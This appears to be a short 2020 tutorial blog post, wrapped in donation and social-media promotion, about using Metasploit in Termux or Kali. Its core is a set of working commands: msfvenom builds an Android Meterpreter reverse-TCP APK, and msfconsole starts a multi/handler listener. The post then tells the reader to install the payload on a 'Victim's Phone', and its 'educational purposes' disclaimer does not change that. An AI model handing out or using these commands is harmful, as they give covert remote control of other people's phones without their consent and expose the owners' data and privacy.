How to Use Metasploit Framework in Termux or Kali
- Technical Shael
- May 6, 2020
- 1 min read
Updated: Jul 20, 2020
➡Hello friends,
Welcome to Technical Shael,
==========================
📢DISCLAIMER📢
This Post and Practical Video is Only For Educational Purposes,Technical Shael Will not Responsible for Any Misuse,Unuthorized or illigle Activity Of This Content.
==========================
🎥Click Here To Check Other Videos🎥
>>>>>👉CLICK HERE👈<<<<<
==========================
🎁Donation Panel🎁
Guys If You Like Our Hard Work Then Please Donate and Help Us To Improve Our Work ...Thank You💖💖
🔰DONATERS Name Will be Visible Here & Video Descryption🔰
🔴DONATER 1:
🔴DONATER 2:
🔴DONATER 3:
==========================
📢Join Our Telegram Channel For Free Materials📢
-----------👉CLICK HERE👈-----------
📢Join Our Whatsapp Group For Discuss📢
------------ 👉CLICK HERE👈-----------
==========================
🙏SUBSCRIBE TO OUR YOUTUBE CHANNEL🙏
==========================
In this post i'll Tell You about How to Use Metasploit framework in Termux or Kali... Try it Ones..totally installation process I describe here in this post... 😇😇
NOTE: Firstly you need to watch Practical video After Apply All the commands in your terminal...
🎥Click Here to Watch Practical Video👇🎥
>>>>>👉CLICK HERE👈<<<<<
==========================
Apply Commands on your termux terminal... 👇
➡️Commands for Create Payload with msfvenom :
msfvenom -p android/meterpreter/reverse_tcp LHOST=(ur IP) LPORT=(any port) R> /sdcard/technical_shael.apk
➡️ Commands for Set Payload :
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST (ur IP without equal or Bracket)
set LPORT (Enter Port Number)
Exploit
NOTE: After SET this,install payload in Victims Phone.
you can install payload first & after you can set this ..no problem
Enjoy 😇😇😇
hope you'll learn something new in this Post.. So plz Like the video, Subscribe our YOUTUBE channel & support us...
Thank you,
Team Technical Shael.
Comments